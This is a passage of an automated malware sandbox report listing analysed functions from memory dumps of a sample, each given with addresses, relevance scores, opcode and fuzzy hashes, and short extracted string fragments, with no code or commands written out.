                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 186616ac9a1b7bf67de33dc185c2a2699d99f5fc181e9c18d8aa57c58025144d
                                                                                        • Instruction ID: 5db0e8b3f39d00d2d47931175845498580e0b11fd712551099de0b801cc21150
                                                                                        • Opcode Fuzzy Hash: 186616ac9a1b7bf67de33dc185c2a2699d99f5fc181e9c18d8aa57c58025144d
                                                                                        • Instruction Fuzzy Hash: C8E065B6304254AB8F061F1A9C148FF3F6AEFC92227048016FD69C2245CF35CD219BA0
                                                                                        Function 054AB620 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 95a6f116e40e7e55ab477610dbb2889fbad8ea84ec46d452c5173367053aacd0
                                                                                        • Instruction ID: fd2c943133f5351f947e2ea5cc129943ca3ebb5e453953e4393ad1952e88a028
                                                                                        • Opcode Fuzzy Hash: 95a6f116e40e7e55ab477610dbb2889fbad8ea84ec46d452c5173367053aacd0
                                                                                        • Instruction Fuzzy Hash: 08F0DA75D0420DEFCB91EFA8D8049DDBBB5FF49300F0081AAE85867220E7319A65EF81
                                                                                        Function 054A7640 Relevance: .0, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d70711730391846dd6c7288e6aa3c07a5d2c9faa1b6ea81d26c241541da55781
                                                                                        • Instruction ID: 5c3d0fd50625124f51333eb2aa7cd67e84907f4f4e5dbc41fbd9855fbc7774c1
                                                                                        • Opcode Fuzzy Hash: d70711730391846dd6c7288e6aa3c07a5d2c9faa1b6ea81d26c241541da55781
                                                                                        • Instruction Fuzzy Hash: 4AE0D877200215A7CB156E1AE851BFF3B6ADBC5222B048026FA55D3301CA35CD1287E0
                                                                                        Function 00FB7D95 Relevance: .0, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec4a6d85ac3c9064c7589b33b99144012ffeeaa750d67b1192c83cbdea972134
                                                                                        • Instruction ID: f08ee12f4cd5282b67f6a3dbc9b7faa4c43aa60f94a0d35ca4a2ecc203248be2
                                                                                        • Opcode Fuzzy Hash: ec4a6d85ac3c9064c7589b33b99144012ffeeaa750d67b1192c83cbdea972134
                                                                                        • Instruction Fuzzy Hash: 1D01F674C006A8CFCB21DF14D994AEABBB6BF45300F0040EAD489A2244DBB41ED4DF10
                                                                                        Function 00FB1630 Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 05dece364d929df2304be2d813f41371d414e5f39f388dda42a3a9c8db4b57b9
                                                                                        • Instruction ID: 2042de0981e8ca3180d626e08f5cfc17070ccbcaf78d08d914570f21da3d55ec
                                                                                        • Opcode Fuzzy Hash: 05dece364d929df2304be2d813f41371d414e5f39f388dda42a3a9c8db4b57b9
                                                                                        • Instruction Fuzzy Hash: 41E0D870C09208DFD701DFB5E419BB97BEDA70A314F449459D409A3191D7711914DB51
                                                                                        Function 00FB1141 Relevance: .0, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c08ea903d582688acb4c098cead4817e175687b09f6932f3f01b4b0a7ae54208
                                                                                        • Instruction ID: 64acc9815ddc920cd6ff3cb251c29cfae69a60012bbc9b786d4203aa2acb9ed2
                                                                                        • Opcode Fuzzy Hash: c08ea903d582688acb4c098cead4817e175687b09f6932f3f01b4b0a7ae54208
                                                                                        • Instruction Fuzzy Hash: 21D05EA288D304DEC3055A9F6C297F63B0CB717311FC05569E70A1217306614414E996
                                                                                        Function 00FB1579 Relevance: .0, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1e5dd4f7b085f215b3c119c7a41285988752fdd86fdaf7ffccc22b00ff9927ef
                                                                                        • Instruction ID: 82635f23d96b462914a1586f27de6f867f5f150eeb9d0b0ecb9d765711e4710b
                                                                                        • Opcode Fuzzy Hash: 1e5dd4f7b085f215b3c119c7a41285988752fdd86fdaf7ffccc22b00ff9927ef
                                                                                        • Instruction Fuzzy Hash: 0FD02BA1C8820002C335167560AB3E93B69DFD5305F2067656509121919A3404099E81
                                                                                        Function 00FB1150 Relevance: .0, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7077d86f5ed7732f3ff1a4bffd5677da59bc6108e239d5ca6b52cb61b6a09c22
                                                                                        • Instruction ID: 1e0898617fe76790bcba92e7db4d059589608ba43fcdb145f910662ba2e21933
                                                                                        • Opcode Fuzzy Hash: 7077d86f5ed7732f3ff1a4bffd5677da59bc6108e239d5ca6b52cb61b6a09c22
                                                                                        • Instruction Fuzzy Hash: 9EC08C2288E208CAC1001A9E7C187F6369C3707315FC06000A20D204620B721414F9A2
                                                                                        Function 054A7619 Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0669f6892745604b62aa36bb3138bc4d91b0c625a90920235e1daa9696d06305
                                                                                        • Instruction ID: 8a470990a62f53639779fced243f3139f190b3749d111b2edbed0240c67db4c2
                                                                                        • Opcode Fuzzy Hash: 0669f6892745604b62aa36bb3138bc4d91b0c625a90920235e1daa9696d06305
                                                                                        • Instruction Fuzzy Hash: 27C02BB3580621A7FB00CE90CD87B8335A5D340703F00C6007388500C2C0A680018541
                                                                                        Function 00FB7486 Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0024416177a8833225cab4ba73aca9e61afea30d2033841a43009bdb4fe1e995
                                                                                        • Instruction ID: 6ea1b56227366a82fdc7f252d86bf273a2d98d86ce9bd55b86d85ad343958784
                                                                                        • Opcode Fuzzy Hash: 0024416177a8833225cab4ba73aca9e61afea30d2033841a43009bdb4fe1e995
                                                                                        • Instruction Fuzzy Hash: BED05E74D02228CFDB24CF21C8947D9BAF5BB44300F1482EA8008A3240DB740FC4DF00
                                                                                        Function 05463CD8 Relevance: .0, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc3ede385a87186476aceabfc3e866dd598d75b669d3d5c59efc524422c40373
                                                                                        • Instruction ID: a2f908ef4c01cde5ed8da711b58991f054952c0689b337f8c63643bd0ba48557
                                                                                        • Opcode Fuzzy Hash: dc3ede385a87186476aceabfc3e866dd598d75b669d3d5c59efc524422c40373
                                                                                        • Instruction Fuzzy Hash: 51B09231085A088AC2146BDAB908BA676A8F701227F441561B54D425588BAA5854D6A6

                                                                                        Non-executed Functions

                                                                                        Function 0546001C Relevance: 65.8, Strings: 52, Instructions: 818COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: f8ada511521db330abec8e05daea71d5204439a16122b09c5a13d8c4cbc917c0
                                                                                        • Instruction ID: 0283a7788059e74abe1ea30166a1659745763e08669fc28d70b2a07dfae59cd2
                                                                                        • Opcode Fuzzy Hash: f8ada511521db330abec8e05daea71d5204439a16122b09c5a13d8c4cbc917c0
                                                                                        • Instruction Fuzzy Hash: DBB29FB1D01A298FEB64DF29DD84B9ABBF5FB48301F0091EAE40CA7354E7755A858F01
                                                                                        Function 05460040 Relevance: 65.8, Strings: 52, Instructions: 804COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: 35e2458f54b460f04a80cc665b18779528b7255e8526853282fd49c90e75ad29
                                                                                        • Instruction ID: 801c2937a110c6102803ef8ddd4bd26c50abe4e7c30d89efff47bdddf4010c81
                                                                                        • Opcode Fuzzy Hash: 35e2458f54b460f04a80cc665b18779528b7255e8526853282fd49c90e75ad29
                                                                                        • Instruction Fuzzy Hash: CDA29FB5D01A298FEB64DF29DD84B9ABBF5FB48301F0081EAE40CA7354E7755A858F01
                                                                                        Function 05461320 Relevance: 65.8, Strings: 52, Instructions: 791COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: a2b0bb7ad23cb8d8c0fb409af240637551aa6f0fda40fb73ab90ef2d833402ad
                                                                                        • Instruction ID: 7f0f22f548deb5521094bd371cfb0c7a1a66332477c30fa939ec387303fac2dc
                                                                                        • Opcode Fuzzy Hash: a2b0bb7ad23cb8d8c0fb409af240637551aa6f0fda40fb73ab90ef2d833402ad
                                                                                        • Instruction Fuzzy Hash: 71A2A0B1E016298FEB64DF2ADD4479ABBF5FF88301F0081EA950CA7354EB755A858F00
                                                                                        Function 0546131E Relevance: 65.8, Strings: 52, Instructions: 789COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$#$&$&2zB$'$($($)$*$+$,$0$0$2$4$4$6EB$9$;$>6A$?$@$D$F$H$I$J$K$K$L$L$M$MG8A$N$P$PBdA$Q$T$U$U$U$V$X$Z YB$\$]$_$a$a$b$tRB$'pB
                                                                                        • API String ID: 0-850010461
                                                                                        • Opcode ID: 658b2fa102918f45cf8d21f630c0e6d48f65e6fba8b1a8e0711b8997c59aaea1
                                                                                        • Instruction ID: d59988683dd3565c479e0a9a8adfd53e1442836a09331781f160c013840f44d6
                                                                                        • Opcode Fuzzy Hash: 658b2fa102918f45cf8d21f630c0e6d48f65e6fba8b1a8e0711b8997c59aaea1
                                                                                        • Instruction Fuzzy Hash: 82A2A0B1E016298FEB64DF2ADD4479ABBF6FF48301F0181EA950CA7354E7755A858F00
                                                                                        Function 054A2C38 Relevance: 9.3, Strings: 7, Instructions: 515COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$T$$^q
                                                                                        • API String ID: 0-2260782631
                                                                                        • Opcode ID: 8706677d334223b6e7b860b2b9cd52ecbadef2f96fdaa02e477fdc1f6e4090a4
                                                                                        • Instruction ID: fc41564eec7c443432db339259fbc99b9a8bb7f07ce340d3764229c6a34da116
                                                                                        • Opcode Fuzzy Hash: 8706677d334223b6e7b860b2b9cd52ecbadef2f96fdaa02e477fdc1f6e4090a4
                                                                                        • Instruction Fuzzy Hash: 1A02F6367082118FCB59DF39C494AAF7BA3BF95300B1988AAD406DB365DB71DC82C791
                                                                                        Function 054A8288 Relevance: 6.7, Strings: 5, Instructions: 427COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$Xbq$$^q$$^q$$^q
                                                                                        • API String ID: 0-2230596736
                                                                                        • Opcode ID: 7b3ea36fab1378183d60e789dfdfbc552299b66081dc21af66d2ab33d245a035
                                                                                        • Instruction ID: d449dabfc220d0f8c5885222f37a4161aec89d5f86319ddd5a80f409413c1bed
                                                                                        • Opcode Fuzzy Hash: 7b3ea36fab1378183d60e789dfdfbc552299b66081dc21af66d2ab33d245a035
                                                                                        • Instruction Fuzzy Hash: 28D1A335B042148BDB59AB7A98586BF7AB7FFD4640B04846AD447E7398DE38CC038792
                                                                                        Function 00FBB1DD Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2=@$sN2
                                                                                        • API String ID: 0-1808423570
                                                                                        • Opcode ID: 1f984c07db25fe47cdb86f70d72fd5ebbef9724b1f8b4adb6eb3e50498bc74e8
                                                                                        • Instruction ID: e66e856d366a0cb7ed819a114dd5b8b63ed76e748ec3ea2ac1c459347cad72a0
                                                                                        • Opcode Fuzzy Hash: 1f984c07db25fe47cdb86f70d72fd5ebbef9724b1f8b4adb6eb3e50498bc74e8
                                                                                        • Instruction Fuzzy Hash: 729160B0E05628CBCB64DF69CA847DCBBF5BF88314F4182E5D18CA6216DB305A95DF09
                                                                                        Function 00FB97BF Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w
                                                                                        • API String ID: 0-476252946
                                                                                        • Opcode ID: 780ea4931b4155f6d58e70a531c4da73d58e1f28ffe05e6f68946f19e9cf7322
                                                                                        • Instruction ID: 015fd43dd930d90484f11dc8b54b042ac00623e3604e3ee556f331512b6c5964
                                                                                        • Opcode Fuzzy Hash: 780ea4931b4155f6d58e70a531c4da73d58e1f28ffe05e6f68946f19e9cf7322
                                                                                        • Instruction Fuzzy Hash: E3413FB1E056588BEB5CCF6B8C4079AFAF3AFC9304F14C1BAD50CAA254DB7005869F55
                                                                                        Function 00FB9062 Relevance: .7, Instructions: 745COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 378bfd133065e398de1ef9dc02479478b9916a981cef66ece1dff556ef78ebe1
                                                                                        • Instruction ID: c8fab0cf26df42bd476002ff3247666c4c639a5670b2eb76776afa532b3b4cc6
                                                                                        • Opcode Fuzzy Hash: 378bfd133065e398de1ef9dc02479478b9916a981cef66ece1dff556ef78ebe1
                                                                                        • Instruction Fuzzy Hash: B2329A21AAE3C18FE707CB7458FA68ABF91DE42200B19C5FFC4C84B597D655900BDB12
                                                                                        Function 05463CC8 Relevance: .2, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0ed7437e887eda1dc6950dd7070bc4b2de17286061c743500a7b2a7e334ce462
                                                                                        • Instruction ID: e0fb8c1f67853bcbb9f43aedf639d03f8081bbc5bff9800b1981e58b1280b361
                                                                                        • Opcode Fuzzy Hash: 0ed7437e887eda1dc6950dd7070bc4b2de17286061c743500a7b2a7e334ce462
                                                                                        • Instruction Fuzzy Hash: 2D618070D042498FDB05DF7AE990AAEBBF2FB84300F149539D004AB26AEB785945CF91
                                                                                        Function 05463D08 Relevance: .1, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5ddfece02ae5774b2ee008408f29ba6189022e3b30e6a5a34d0df686cbcd8c67
                                                                                        • Instruction ID: 8e3869cf9a435b9dd4c3ef6dcd71cc5464e250da9b7e248f6e433365e020fc38
                                                                                        • Opcode Fuzzy Hash: 5ddfece02ae5774b2ee008408f29ba6189022e3b30e6a5a34d0df686cbcd8c67
                                                                                        • Instruction Fuzzy Hash: 6E511370D042098FDB45DF7AE980B9E7BF2FB84301F149529D004AB36AEB785945CF90
                                                                                        Function 00FB9578 Relevance: .1, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 698803aa5437025e07220c3b0777b9a736d56db3c68cff031f63b5a07f40bfde
                                                                                        • Instruction ID: 2229028d2873d6972d9624717382eaaed283336ab8a533d3ff3e7fd6f813d0a4
                                                                                        • Opcode Fuzzy Hash: 698803aa5437025e07220c3b0777b9a736d56db3c68cff031f63b5a07f40bfde
                                                                                        • Instruction Fuzzy Hash: 75513E71E45208CFDB45DF7AE580B9EBBF2BB88300F14D929D004AB369EB7459498F40
                                                                                        Function 059BD4D0 Relevance: .1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c8ec88536bd88f4e49ceda7cf05d9a58e5fa8e754c163c67eec5f84ce2a02c1
                                                                                        • Instruction ID: 48cdb34fddd7fc821305a81f4cd315c48399a9c973fe7bc1c7ae5c9eb0fde133
                                                                                        • Opcode Fuzzy Hash: 6c8ec88536bd88f4e49ceda7cf05d9a58e5fa8e754c163c67eec5f84ce2a02c1
                                                                                        • Instruction Fuzzy Hash: F041EFB4D00348DFEB14CFA9C985BDEBBF1BB09314F209129E819AB254D7B49985CF85
                                                                                        Function 00FB6264 Relevance: 8.8, Strings: 7, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$"$$$2$:$H%B$K
                                                                                        • API String ID: 0-727289797
                                                                                        • Opcode ID: 001b834b692b029ed8728ef63e42323f549db3ed261e7e5d79fa6814df23b736
                                                                                        • Instruction ID: b5a8a4fd8a48a0b7475abfaee8da461089dd0440619f18b87f0ae6242e33854e
                                                                                        • Opcode Fuzzy Hash: 001b834b692b029ed8728ef63e42323f549db3ed261e7e5d79fa6814df23b736
                                                                                        • Instruction Fuzzy Hash: EEF0F2B0800629CFEB71CF00D8887DABAB4BB02345F6010E4D008A7280CB7A4AC5EF00
                                                                                        Function 00FB2CE1 Relevance: 7.5, Strings: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *$-$K$S$_$r
                                                                                        • API String ID: 0-3847339943
                                                                                        • Opcode ID: d24b5f02c081103783362e50836ec3d886e1eb3eb451ce7c59f7e6adefd47ed8
                                                                                        • Instruction ID: ac816608a5afa7ea5e3916e38aa2ba15074dc4c44371a24b8d33873957ab35db
                                                                                        • Opcode Fuzzy Hash: d24b5f02c081103783362e50836ec3d886e1eb3eb451ce7c59f7e6adefd47ed8
                                                                                        • Instruction Fuzzy Hash: BB31A2B4C00629CFDB64DFA6D8487D8BBF5BB08355F1495EAE40DA2680DB780AC5DF01
                                                                                        Function 00FB5A88 Relevance: 7.5, Strings: 6, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$($*$]$`$k
                                                                                        • API String ID: 0-605889203
                                                                                        • Opcode ID: c57a0ed27d13545d07e5962d49207c9daa2a037a6377814de088a31648355124
                                                                                        • Instruction ID: 5eeab87563186266b954380ff734eab9cd0325f12f8d86288a7ee047ed829ad4
                                                                                        • Opcode Fuzzy Hash: c57a0ed27d13545d07e5962d49207c9daa2a037a6377814de088a31648355124
                                                                                        • Instruction Fuzzy Hash: AF11CEB4C01628CFDBB4DF25D8483D8BAB0FB09349F2084EAD10CA2640DB780ED5AF01
                                                                                        Function 00FB8B07 Relevance: 6.3, Strings: 5, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *$,$-$J$U
                                                                                        • API String ID: 0-2570058720
                                                                                        • Opcode ID: fdfeeba28eb984dfcf92986dad2f77690f986c9352d4a9c36bcb46e2a384259f
                                                                                        • Instruction ID: 62bf053a01dddcaeea5290a9bd5c75c389daf29b4d91f6b34a5a2616142af0fc
                                                                                        • Opcode Fuzzy Hash: fdfeeba28eb984dfcf92986dad2f77690f986c9352d4a9c36bcb46e2a384259f
                                                                                        • Instruction Fuzzy Hash: 80219EB4D0566ACFDB70DF29D9487ECBAB4AB08301F1480EAD409E3680DB794AD5AF01
                                                                                        Function 00FB8576 Relevance: 6.3, Strings: 5, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "$K$X$^$n+tA
                                                                                        • API String ID: 0-440443359
                                                                                        • Opcode ID: b08f27aa4803ea1b626e7f002833a8d1c3c13548af84418a90097578bc01a6c7
                                                                                        • Instruction ID: 695d448e66a3c21ba55f8e8c3a29f34754a31ed09624a459b8f4c6e57b70778c
